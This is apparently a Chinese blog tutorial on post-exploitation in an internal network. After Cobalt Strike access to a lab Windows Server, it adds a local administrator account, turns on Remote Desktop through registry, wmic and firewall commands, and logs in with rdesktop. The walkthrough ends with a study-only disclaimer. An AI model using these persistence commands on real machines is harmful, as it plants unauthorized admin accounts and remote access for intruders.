内网渗透-windows远程用户管理

文章目录

      • 0x01 获取window权限(管理员)
      • 0x02 添加用户,并且到管理员组
      • 0x03 开启远程桌面
      • 0x04 添加到远程桌面组
      • 0x05 进行远程
      • 0x06 免责声明

0x01 获取window权限(管理员)

使用cs上线用户
kali:192.168.253.234
window server 2019: 192.168.253.243
内网渗透-windows远程用户管理_第1张图片

0x02 添加用户,并且到管理员组

net user uname pass /add  添加用户名为name,密码为pass
net localgroup Administrators uname /add  将用户名为uname的用户添加到管理员组
net user uname /del 删除uname用户

添加用户,并且查看当前的用户
内网渗透-windows远程用户管理_第2张图片

用户添加到管理员组,并且查看管理员组成员:

内网渗透-windows远程用户管理_第3张图片

0x03 开启远程桌面

设置远程桌面的端口(默认开启3389)
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
开启远程桌面:(1代表开启,0代表关闭)
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
开启防火墙通过:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

内网渗透-windows远程用户管理_第4张图片

0x04 添加到远程桌面组

net localgroup "Remote Desktop Users" uname /add 将用户名为uname的用户添加到远程桌面组

内网渗透-windows远程用户管理_第5张图片

0x05 进行远程

rdesktop IP地址
账号:admin123
密码:Admin@123

内网渗透-windows远程用户管理_第6张图片

0x06 免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

你可能感兴趣的:(内网渗透测试,windows,java,开发语言)